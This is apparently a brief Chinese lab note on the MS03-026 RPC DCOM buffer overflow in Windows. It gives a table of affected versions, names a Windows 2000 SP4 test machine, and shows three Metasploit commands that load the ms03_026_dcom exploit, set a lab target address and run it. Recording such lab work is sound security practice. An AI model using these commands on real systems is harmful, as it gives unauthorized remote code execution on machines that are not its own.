某些RPC的DCOM接口中的缓冲区溢出使远程攻击者可以通过格式错误的消息执行任意代码
| Product | CPU Architecture | Version | Update | Tested |
|---|---|---|---|---|
| Windows 2000 | ||||
| Windows 2000 | SP1 | |||
| Windows 2000 | SP2 | |||
| Windows 2000 | SP3 | |||
| Windows 2000 | SP4 | ✔ | ||
| Windows Server 2003 | R2 | |||
| Windows Nt | SP1 | |||
| Windows Nt | 4.0 | SP2 | ||
| Windows Nt | 4.0 | SP3 | ||
| Windows Nt | 4.0 | SP4 | ||
| Windows Nt | 4.0 | SP5 | ||
| Windows Nt | 4.0 | Sp6a | ||
| Windows Nt | 4.0 | SP6 | ||
| Windows Xp | SP1 | |||
| Windows Xp | Gold |
测试系统Windows 2000 SP4 x86
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.17
run
查看系统信息
